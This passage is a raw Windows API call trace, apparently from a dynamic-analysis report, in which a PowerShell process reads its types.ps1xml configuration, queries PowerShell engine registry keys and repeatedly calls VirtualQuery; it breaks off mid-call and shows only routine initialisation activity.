1 [0026.225] GetLastError () returned 0x0 [0026.225] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.225] GetLastError () returned 0x0 [0026.225] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.226] GetLastError () returned 0x0 [0026.226] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.226] GetLastError () returned 0x0 [0026.226] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.226] GetLastError () returned 0x0 [0026.228] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.228] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.229] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.229] GetLastError () returned 0x0 [0026.230] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.230] GetLastError () returned 0x0 [0026.230] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.230] GetLastError () returned 0x0 [0026.230] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.230] GetLastError () returned 0x0 [0026.230] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.230] GetLastError () returned 0x0 [0026.230] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.230] GetLastError () returned 0x0 [0026.231] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.231] GetLastError () returned 0x0 [0026.231] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.231] GetLastError () returned 0x0 [0026.231] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.231] GetLastError () returned 0x0 [0026.231] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.231] GetLastError () returned 0x0 [0026.236] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.236] GetLastError () returned 0x0 [0026.236] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.236] GetLastError () returned 0x0 [0026.236] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.237] GetLastError () returned 0x0 [0026.237] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.237] GetLastError () returned 0x0 [0026.237] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.237] GetLastError () returned 0x0 [0026.237] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.237] GetLastError () returned 0x0 [0026.237] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.237] GetLastError () returned 0x0 [0026.238] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.238] GetLastError () returned 0x0 [0026.238] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1b4, lpOverlapped=0x0) returned 1 [0026.238] GetLastError () returned 0x0 [0026.238] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x0, lpOverlapped=0x0) returned 1 [0026.238] GetLastError () returned 0x0 [0026.239] CloseHandle (hObject=0x32c) returned 1 [0026.239] GetLastError () returned 0x0 [0026.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.239] GetLastError () returned 0x0 [0026.239] SetErrorMode (uMode=0x1) returned 0x1 [0026.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1f47ef4 | out: lpFileInformation=0x1f47ef4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0026.239] GetLastError () returned 0x0 [0026.239] SetErrorMode (uMode=0x1) returned 0x1 [0026.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.239] GetLastError () returned 0x0 [0026.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce468 | out: phkResult=0x1ce468*=0x32c) returned 0x0 [0026.240] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce4b0, lpData=0x0, lpcbData=0x1ce4ac*=0x0 | out: lpType=0x1ce4b0*=0x1, lpData=0x0, lpcbData=0x1ce4ac*=0x56) returned 0x0 [0026.240] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce4b0, lpData=0x2b64c0, lpcbData=0x1ce4ac*=0x56 | out: lpType=0x1ce4b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce4ac*=0x56) returned 0x0 [0026.240] RegCloseKey (hKey=0x32c) returned 0x0 [0026.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.240] GetLastError () returned 0x0 [0026.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.240] GetLastError () returned 0x0 [0026.370] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.396] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.398] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.398] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.398] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.399] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.400] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.403] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.413] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.414] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.414] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.414] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.414] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.414] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.415] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.415] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.419] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.421] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.422] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.423] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.423] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.424] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.425] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.425] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.425] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.427] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.427] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.427] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.428] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.428] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.430] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.433] VirtualQuery (in: lpAddress=0x1cd3a8, lpBuffer=0x1ce3a8, dwLength=0x1c | out: lpBuffer=0x1ce3a8*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.433] VirtualQuery (in: lpAddress=0x1cd3a8, lpBuffer=0x1ce3a8, dwLength=0x1c | out: lpBuffer=0x1ce3a8*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.433] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.434] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.467] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.468] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.468] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.469] GetLastError () returned 0xcb [0026.471] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.480] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.480] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.480] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.480] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.482] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.482] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.484] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.485] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce52c | out: phkResult=0x1ce52c*=0x328) returned 0x0 [0026.490] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce594, lpData=0x0, lpcbData=0x1ce590*=0x0 | out: lpType=0x1ce594*=0x1, lpData=0x0, lpcbData=0x1ce590*=0x74) returned 0x0 [0026.491] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce574, lpData=0x0, lpcbData=0x1ce570*=0x0 | out: lpType=0x1ce574*=0x1, lpData=0x0, lpcbData=0x1ce570*=0x74) returned 0x0 [0026.491] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce574, lpData=0x2b64c0, lpcbData=0x1ce570*=0x74 | out: lpType=0x1ce574*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ce570*=0x74) returned 0x0 [0026.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ce0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", 